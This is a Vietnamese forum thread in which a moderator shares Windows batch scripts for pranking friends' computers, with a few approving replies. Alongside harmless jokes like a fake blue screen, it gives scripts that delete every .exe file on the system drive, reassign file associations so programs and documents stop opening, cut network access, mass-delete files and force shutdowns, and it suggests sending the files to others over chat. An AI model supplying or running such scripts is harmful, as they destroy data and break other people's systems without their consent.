Diễn Đàn Hỗ Trợ FM
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


[Thủ thuật] Một số code bat dùng để troll máy tính bạn bè :))

Tác giả: - vào lúc:
Kiwi
Bài viết : 289
Points : 601
Like : 160
Punbb
An toàn
Status : Đành vậy thế thôi
KiwiS-MOD
9/1/2016, 20:45
#1
Hôm nay mình sẽ giới thiệu 1 số code bat khá hay dùng để chọc phá máy tính bạn bè Smile

Bước 1:
Tạo 1 file notepad bằng cách chuột phải vào Desktop >> New >> Text document

Bước 2:
Copy 1 số code ở dưới vào notepad và save lại dưới dạng abc.bat

[Thủ thuật] Một số code bat dùng để troll máy tính bạn bè :)) 312

Swap Mouse button (đảo chuột trái thành phải và ngược lại)

Code:

@ echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------


Delete all .exe files in the computer (suy nghĩ kĩ khi sử dụng code này)

Code:

@ echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------


Disable internet (làm mất mạng tạm thời)

Code:

@ echo off
rem ---------------------------------
rem Disable Internet
@Echo off & @@Break Off
Ipconfig /release
%jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?!
P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%
rem ---------------------------------


Confuse File Extensions (đổi định dạng của file, ví dụ exe thành png...)

Code:

@ echo off
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------


Create Fake Blue Screen Of Death - Màn hình xanh chết chóc giả

Chắc ai cũng biết đến màn hình xanh huyền thoại nhỉ... nỗi đáng sợ của những người sử dụng máy tính
Sau đây mình sẽ hướng dẫn tạo ra 1 cái màn hình xanh giả để chơi troll 1 ai đó

- Sau khi run file này. Lập tức sẽ có màn hình xanh giả được tạo ra. Với những người không để ý kĩ thì sẽ lầm tưởng rằng bị màn hình xanh thật

- Tắt đi bằng cách Alt + F4 là đc

Code:

@echo off
echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta
echo. >> bsod.hta
echo ^<hta:application id="oBVC" >> bsod.hta
echo applicationname="BSOD" >> bsod.hta
echo version="1.0" >> bsod.hta
echo maximizebutton="no" >> bsod.hta
echo minimizebutton="no" >> bsod.hta
echo sysmenu="no" >> bsod.hta
echo Caption="no" >> bsod.hta
echo windowstate="maximize"/^> >> bsod.hta
echo. >> bsod.hta
echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta
echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta
echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Technical information:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta
echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta
echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^</font^> >> bsod.hta
echo ^</body^>^</html^> >> bsod.hta
start "" /wait "bsod.hta"
del /s /f /q "bsod.hta" > nul


Xóa các tập tin không cần thiết cho máy tính (giúp windows hoạt động mượt hơn)

Code:

@echo off
color 0C
echo Tien trinh se xoa file khong can thiet ...
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo Tat ca da ket thuc.!
pause


Cuối cùng code dùng để tắt và reset máy chỉ với 1 click

Code:

shutdown -s -t 60 -c "loi nhan" -f

Có thể thay s bằng r dùng để reset máy
-t 60 với 60 là thời gian tắt tính bằng giây, dùng để hẹn giờ tắt máy mà không cần can thiệp bởi bất cứ phần mềm nào. Các bạn có thể sửa lại tùy ý
-c là lời nhắn dùng để tự kỉ hoặc troll winking

Lời kết: File sau khi lưu lại dưới dạng .bat có thể gửi qua yahoo,...

Được sửa bởi Titus ngày 9/1/2016, 21:23; sửa lần 1.
Giựt
Bài viết : 272
Points : 440
Like : 89
Punbb
Cẩn thận
Status : Giựt đẹp trai
GiựtMOD
9/1/2016, 21:08
#2
Quỳ [Thủ thuật] Một số code bat dùng để troll máy tính bạn bè :)) 1f602
the_dav
Bài viết : 226
Points : 323
Like : 47
Punbb
Quản trị
the_davMEM LV3
9/1/2016, 21:37
#3
hay vai~ a vua thu xong haha
Kiwi
Bài viết : 289
Points : 601
Like : 160
Punbb
An toàn
Status : Đành vậy thế thôi
KiwiS-MOD
9/1/2016, 22:12
#4
Troll mấy thằng bạn chắc nó khóc tiếng campuchia Smile
Sponsored content
#5